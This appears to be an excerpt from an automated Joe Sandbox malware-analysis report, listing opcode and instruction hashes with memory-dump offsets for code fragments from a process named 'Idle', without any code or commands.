                  • Instruction ID: 4588de15962fac694d9c8a642ba451b5c42dc360a66e8d98329e7dbb4402609b
                  • Opcode Fuzzy Hash: d5133a0b76ba50774e5dc40c1d901ae5fb9507c3a88a77ee66dccf06830b8048
                  • Instruction Fuzzy Hash: 7B019A30A0990E8FDB98EF68C4656BA77A1FF68304F21547EE41EC35A4CEB5A650CB40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 75e240de4448a4a9dd96036b1bef53db443391011154198ac47d202c31024074
                  • Instruction ID: bff7c74e2e1efa7e81f115253ce5f2947e8e78e50df93f0431b2936a419c86b3
                  • Opcode Fuzzy Hash: 75e240de4448a4a9dd96036b1bef53db443391011154198ac47d202c31024074
                  • Instruction Fuzzy Hash: A3116D30A0964E8FDBA8EF68C4696FD7BE0FF18304F5105BED42AC65A1DB75A650C740
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eece6ea17dd697a67d2f200747b701d3d9b0cc08c89ef260b3532890f978c643
                  • Instruction ID: 607c08bcc94d071d320ad64720f11e8e2748b210a229c7f37c7a1efd55b7589d
                  • Opcode Fuzzy Hash: eece6ea17dd697a67d2f200747b701d3d9b0cc08c89ef260b3532890f978c643
                  • Instruction Fuzzy Hash: 49016130D0450E8FDB94EF68C4545BA77B1FF98315F14497AE419D3199DB70A1908780
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 01628e558beea813d3cd37e3322444ca552cf9d22c9b1801613e6a455931a3cf
                  • Instruction ID: 0d9abea8f041a9ad3d1a04c50e44427b11126fe4b715ec2588037baa18ec8855
                  • Opcode Fuzzy Hash: 01628e558beea813d3cd37e3322444ca552cf9d22c9b1801613e6a455931a3cf
                  • Instruction Fuzzy Hash: 4801D630A0A68E8FDBD8DF64C4655B93BA1FF25304F4110BAD808C71A2DA799550CB80
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8be56923b1b63a7a1ec23659b6872e07dd5fc3b761befc4eae52a928c69b59a9
                  • Instruction ID: 83b5d89346417a1ab353cceee0f57a2180d143f9629aa9ccedd4c718fe7efd55
                  • Opcode Fuzzy Hash: 8be56923b1b63a7a1ec23659b6872e07dd5fc3b761befc4eae52a928c69b59a9
                  • Instruction Fuzzy Hash: 6801F230D0A64E8FEB94DF6488542FA3BB0FF94304F05457AE818C31A6DB7491948781
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction ID: dda8ce46e190816e5ebc5f5bbf14645127bb5504ddbcf576dc65b4bc88226100
                  • Opcode Fuzzy Hash: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction Fuzzy Hash: 5901D870E0A60E4FE791ABB4C4595A977E0FF15304F0656B6D418C20B5DE74E2548700
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2738f0f9aebc46161afa3f9fa955773190e3bc0b91841633c8a814087ec8ca9
                  • Instruction ID: 4396d82e00cf40b4f2571c8f74c8ebb430c06f98b49a28c70db0c4fba5693c71
                  • Opcode Fuzzy Hash: a2738f0f9aebc46161afa3f9fa955773190e3bc0b91841633c8a814087ec8ca9
                  • Instruction Fuzzy Hash: D401A230A0A64E8FE7A1EBA8C4595F97BE0FF59304F4655B6D408C60A6EF78E2848700
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7d72c999ed550d91f315b9c51206d1724f0fa280ebeb3c814c3871af50c04f0
                  • Instruction ID: dd15530ff3519a9a5c73027a0b885689555def32eed18c574725a31e3d54cb5e
                  • Opcode Fuzzy Hash: e7d72c999ed550d91f315b9c51206d1724f0fa280ebeb3c814c3871af50c04f0
                  • Instruction Fuzzy Hash: 61015E70A1550E8FEB94FBA8C4A86BE76E0FF29304F11147ED41ED61A1EE79A250C740
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0cedadba09a8570f17715cc96b5a07c1685d3e0f90d926964fb0139b0fd2a0c6
                  • Instruction ID: 5fd3a968b30c324caedf753882ae7d255def6223e4e29e8b6ed242cc16dab20c
                  • Opcode Fuzzy Hash: 0cedadba09a8570f17715cc96b5a07c1685d3e0f90d926964fb0139b0fd2a0c6
                  • Instruction Fuzzy Hash: 50018430A0550E8FEB98EF64C4A56BE7BA1FF58304F51247EE42EC61A4DE75A650CB40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80b39a9b513355268ec501a89ec724e4b850344201c24bcdd180946e0b4c72e1
                  • Instruction ID: bfc96a1c1f2e7df9a69ba3c802b1d99b51cc9d72f768cd8172e755a2b600cd2e
                  • Opcode Fuzzy Hash: 80b39a9b513355268ec501a89ec724e4b850344201c24bcdd180946e0b4c72e1
                  • Instruction Fuzzy Hash: 24018830A4F64D4FD7A2EBB4C4695A97BE0FF15300F4654F6D458C70B6DA74A5448701
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8e2b2cd3a34b364458ff16d82c33c06d2813570988b5bbabe2ca5bed2941a40
                  • Instruction ID: 565b892a95bee6bb0974df7b22a871d21e0084eb73a13f9128dd0dcd9c5b2ab3
                  • Opcode Fuzzy Hash: f8e2b2cd3a34b364458ff16d82c33c06d2813570988b5bbabe2ca5bed2941a40
                  • Instruction Fuzzy Hash: AE017C30A5590E8FEB94EF68C8696BEB7E0FF18304F10087AE41EC61A4EF74A250C700
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 923253a5caeb583a3de99c45d47ad8aab99b32df013b253abafca6a77987e0cc
                  • Instruction ID: 88454ced1e897cf69b14fab82c30f960a2bcda02049f152f33d3f66f92063af7
                  • Opcode Fuzzy Hash: 923253a5caeb583a3de99c45d47ad8aab99b32df013b253abafca6a77987e0cc
                  • Instruction Fuzzy Hash: 26017131A4E78E5FE7A2EBB8C8695A97BE0EF09300F0655F7D058C70B6DE64A5848701
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f693ab73e86a498cc49959907833b847be99b609309ee75a50142afa80ceb40
                  • Instruction ID: e7fe61ebef11fc789e318169d4065a8cb187d89a17b3dd2b8c87b2d75a1b1e04
                  • Opcode Fuzzy Hash: 5f693ab73e86a498cc49959907833b847be99b609309ee75a50142afa80ceb40
                  • Instruction Fuzzy Hash: 16018430A4F68E8FE752AB7888695A97FE0EF16300F0645F7D449C70A6DA64AA84C701
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aced70ddebdbbff52de3c85896dd5daf8aefd13efacb396d1ee732e7c214065b
                  • Instruction ID: 2afe73ab24494b422366fa20bd6db8003cfe1c1f02cef50649126bdea2424c25
                  • Opcode Fuzzy Hash: aced70ddebdbbff52de3c85896dd5daf8aefd13efacb396d1ee732e7c214065b
                  • Instruction Fuzzy Hash: DE01F571E0950E8BEB68DF94C4714BDB7B2EF54300F11047EC00A972E2DE786A41CB40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 29d6e8ede2ccc5d7dbfcd618e0ae09fb49fef072aae41fcb46448cba1b0f1fb6
                  • Instruction ID: 2356f89edffee1e6043533cac36947534cb0c120cd9526de6b4e41458959b33f
                  • Opcode Fuzzy Hash: 29d6e8ede2ccc5d7dbfcd618e0ae09fb49fef072aae41fcb46448cba1b0f1fb6
                  • Instruction Fuzzy Hash: 1401D870A0E74D4FE791ABB888695A97FE0EF05304F0615F6D448CB0B6DA78E5648301
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2de74193ca145f24f4c19c312c77d175e672f99d1d1a8611e1d59457e7fb69c
                  • Instruction ID: 9dcf486af85c0582b79da968e7b94681cea3dc7cbc248e46a29cb141faf8226c
                  • Opcode Fuzzy Hash: a2de74193ca145f24f4c19c312c77d175e672f99d1d1a8611e1d59457e7fb69c
                  • Instruction Fuzzy Hash: 2D016230A1960E8EEB98EFA4C4685B976A0FF18308F11187EE41EC21E5DF75A550C600
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction ID: 86d2f720ce8802973218eb826a5b267d76927daa8107ee14fb2c9720d7f9ba6d
                  • Opcode Fuzzy Hash: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction Fuzzy Hash: 68016230A1560E8BEB99EFA4C4696BD73A1FF18309F11187ED41EC21E5DE75E250C600
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93858b17e0ffc8de97578b9f9be1bf9710828a98e99cd9e3fc3dc6228a1a01e9
                  • Instruction ID: 9d527030f865cdfab479f402c6cd20a6af76f32894cb096a744488af9fd0e010
                  • Opcode Fuzzy Hash: 93858b17e0ffc8de97578b9f9be1bf9710828a98e99cd9e3fc3dc6228a1a01e9
                  • Instruction Fuzzy Hash: 7D018121A0F38E4FD3A2ABA498A51E93BB0AF42214F4A14B7D099C60B3D96995488351
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4057d4bfa69509398b07521715e65aac04e95c7952b28dd9734f20e194682c45
                  • Instruction ID: be54adab6be0e23f6cbe876260055e8abb36a3e4984db189f5c99e759e13ef12
                  • Opcode Fuzzy Hash: 4057d4bfa69509398b07521715e65aac04e95c7952b28dd9734f20e194682c45
                  • Instruction Fuzzy Hash: D8F0A470B1E55F4AEFE49BA888682FA77E4EF65314F05103AE46DC60E1EE7456448240
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5faef0d5329ba3fd9dd0ad975e95943e9294d701481ab903c69b9a74fbfce90f
                  • Instruction ID: 2d78d2ea1d6218833053894d9c7f6965780c95cefbf641a9f40661149d1166ed
                  • Opcode Fuzzy Hash: 5faef0d5329ba3fd9dd0ad975e95943e9294d701481ab903c69b9a74fbfce90f
                  • Instruction Fuzzy Hash: F0F0963090F38D4FEBA9DFA488655E93FA0FF05204F4515BAE459C60E6DB78D554C700
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d0807ba500f141244450ad29341129d5fd2ee8ed234862f65c21a13c19873d01
                  • Instruction ID: d10eb9ebcbfba0cb56082bab7c348dfd149b4dd8febd0c9d5b899ec5ad560480
                  • Opcode Fuzzy Hash: d0807ba500f141244450ad29341129d5fd2ee8ed234862f65c21a13c19873d01
                  • Instruction Fuzzy Hash: DC01A93090F78E8FDB95DF64C8651E93FA0FF55300F4520BBE458C60A2EA789654C741
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 463d95590fd9bfa1d2cbc56c6e367a9a14648a81bc470993842f948f960243af
                  • Instruction ID: 18227cce237956ebf000dfc89575f0d0c7540a8c47b64b7f727476ec1d419fe8
                  • Opcode Fuzzy Hash: 463d95590fd9bfa1d2cbc56c6e367a9a14648a81bc470993842f948f960243af
                  • Instruction Fuzzy Hash: 1EF0C230A0A64E8FEBD8EF6484256FA37A4EF25304F11147AE81DC31A1DE79A650CB80
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c7f2110bd9e0be50f16aa4a4d06a287e47ec83d53131d82b1268cd83ca8f901
                  • Instruction ID: 0204a9186719e8bfa0583486ce07af3b62b5fa7198b0f2b3c64605b9fef0f813
                  • Opcode Fuzzy Hash: 0c7f2110bd9e0be50f16aa4a4d06a287e47ec83d53131d82b1268cd83ca8f901
                  • Instruction Fuzzy Hash: 2FF06D3698F2C99FD7269BB088715E93FA4AF52214B1900E6E445C70A2C9AE2646C761
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a25593c67898bc8b3250c45cb2e21fbf31211b37ba37b09efaec5a484259136b
                  • Instruction ID: 653751018d0859fbb63d5c0140d02e7e0aa156784826df7af164cc7659898101
                  • Opcode Fuzzy Hash: a25593c67898bc8b3250c45cb2e21fbf31211b37ba37b09efaec5a484259136b
                  • Instruction Fuzzy Hash: 7FF03771E5991C8EDFA4EB9888957ECB7B1FF58300F414066D40CE3252DF3869808B00
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3839584144ea72b02090a7ddc5e9219bc136a728ead71d1343bcd16a997a4b2f
                  • Instruction ID: a969375f62a61cdd73eb5f051343e8b05d91c9a373adeb1238f581193ddffb9b
                  • Opcode Fuzzy Hash: 3839584144ea72b02090a7ddc5e9219bc136a728ead71d1343bcd16a997a4b2f
                  • Instruction Fuzzy Hash: ED01A23090E78E4FDB95AFA888652FA7BB0FF16200F4601BBD458C61A2EB785644C740
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e61c1fc8f7bd6094e355b5da011f7f10800573bfb401bf61e49501fed6d1b853
                  • Instruction ID: f26c7e864d87196d053e1d04afad02792f09db7d5ee6b676d0ad31d1056f9069
                  • Opcode Fuzzy Hash: e61c1fc8f7bd6094e355b5da011f7f10800573bfb401bf61e49501fed6d1b853
                  • Instruction Fuzzy Hash: 7A016D30F0550E8BEB60EF58C890AEEB3B1EB44311F1181B6D409E7294DE75AE448F84
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction ID: ef536e20907435eade4cb9562d6ca5f1ce3e862e9208ce0a7bcf21cf37bdcff0
                  • Opcode Fuzzy Hash: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction Fuzzy Hash: 3EF0AF3090E38D8FEBAA9F7488252A93B60EF56204F4614FAD449C60E2DA68D548C701
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dcf8f88898a526362b1bba2232f9e3876bc3e272bc9720251047fe7184738799
                  • Instruction ID: f6620e3617b5a48846cd5793ad5f73618a67fcd472e0a17340ec268d07fb565b
                  • Opcode Fuzzy Hash: dcf8f88898a526362b1bba2232f9e3876bc3e272bc9720251047fe7184738799
                  • Instruction Fuzzy Hash: C6017170E0961E8FDFA4DB90C490AFEB3B1EF54310F515676C409A2295DF78AA85CB90
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8834c02a4c340f2bee1ebef5afb6e25b4042970ad0883364efa77d73e51ce7cb
                  • Instruction ID: 2f9c8b1ada421820fce9e78b6dc55e881ca5c084837081fae59ef25d6beb49fa
                  • Opcode Fuzzy Hash: 8834c02a4c340f2bee1ebef5afb6e25b4042970ad0883364efa77d73e51ce7cb
                  • Instruction Fuzzy Hash: E7F0E77191991D9FCB95DF58D4A4A9DB7B0FF69310F2001AAD40AE7260DA71AA81DF00
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 03b4e3316d924be552ade6185ec6b54d960c3f6080b4da401e1f7ca6e7f3ddb2
                  • Instruction ID: b09cbc600a4ca51f02943de58b57200efc21ec19c32600fd894e0b6384d83623
                  • Opcode Fuzzy Hash: 03b4e3316d924be552ade6185ec6b54d960c3f6080b4da401e1f7ca6e7f3ddb2
                  • Instruction Fuzzy Hash: A9F0127090995CCFDF54DF58C854ADDBBB1FF25305F1400A9D00EAB260CA75A9C1CB00
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 96cdfb13ef8a1cc31f3a1c05ec0f38567a93dace88ad9ede349803e0dd38c442
                  • Instruction ID: 48d635ff116071083cbf1abecb5e02499339d95f7da01a29186f2c5dd51e32dc
                  • Opcode Fuzzy Hash: 96cdfb13ef8a1cc31f3a1c05ec0f38567a93dace88ad9ede349803e0dd38c442
                  • Instruction Fuzzy Hash: E3F0EC70E1561C4EDBA4EB58C4597A9B3B1FF55300F5040EAD44CD3262DF305A858F01
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction ID: 8e576a84258430c9164d6ce8600f10f0f86b00a7158c598329384fe8342a5cac
                  • Opcode Fuzzy Hash: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction Fuzzy Hash: 7AF0A970D5951E8FEBA8EB99D4A4BFCB7B1EB54305F1140BED41DA2291CE781A80DF00
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 73f6f367275709d2464e116c2e20aef8bf1b4083e5cfe6e71a2ae77569c070cb
                  • Instruction ID: d45201c30252bb0169023960ee00bc9e68faedccf365fbe20904fad69884a553
                  • Opcode Fuzzy Hash: 73f6f367275709d2464e116c2e20aef8bf1b4083e5cfe6e71a2ae77569c070cb
                  • Instruction Fuzzy Hash: BFF05E36B4954A8BDB28DF84CC619FD73B2BFA4751B05017AD416DB2EADEB429018B40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ba8496951a8da90808f32b37f52f30ba607f2e759683cb9722b24a33d03c0572
                  • Instruction ID: c5d5a2a90fa71c69dd772d458388e626d8d1efd5581f20286195eee31a16bc38
                  • Opcode Fuzzy Hash: ba8496951a8da90808f32b37f52f30ba607f2e759683cb9722b24a33d03c0572
                  • Instruction Fuzzy Hash: 7BC012A1F09A0D4EFB94964C5CE59FC5791EB14200F100036840DD71A2DD6A24818780
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b7601b3eeb62f93791d0ac5fee9ea208b3d5f8b13c476006fdac41f6d1d1e909
                  • Instruction ID: 7f098508fec56914d9c2f335a12ec6e884c0a8a0fd7c464a6b00c47040f86d1e
                  • Opcode Fuzzy Hash: b7601b3eeb62f93791d0ac5fee9ea208b3d5f8b13c476006fdac41f6d1d1e909
                  • Instruction Fuzzy Hash: 5FD0C910F0F64F85F6F8978181B027D2190AF20710EA6003DC09F41CF9CD9CBB016206
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b9e99988e234242d5d6097d1341b5084e435fcd210e062595d2b6c091752d155
                  • Instruction ID: c560c38a8aa7f0ee6814138e62991b1009aec4d4c038d17c24398e3ffa4c1834
                  • Opcode Fuzzy Hash: b9e99988e234242d5d6097d1341b5084e435fcd210e062595d2b6c091752d155
                  • Instruction Fuzzy Hash: 27D09231E4E55E8ED7ADDB54C8A26E87760AF09340F1144FA820D962A1CD686AC09B90
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction ID: 3d7c6bb2f21c2e3b2d5478157c47965f9ea344177656a9e7a68a443595687210
                  • Opcode Fuzzy Hash: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction Fuzzy Hash: 9EC0023591495E9FDF91EF94D8555EE73A1FF54201B000526E82DD3151DB70A6208B40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
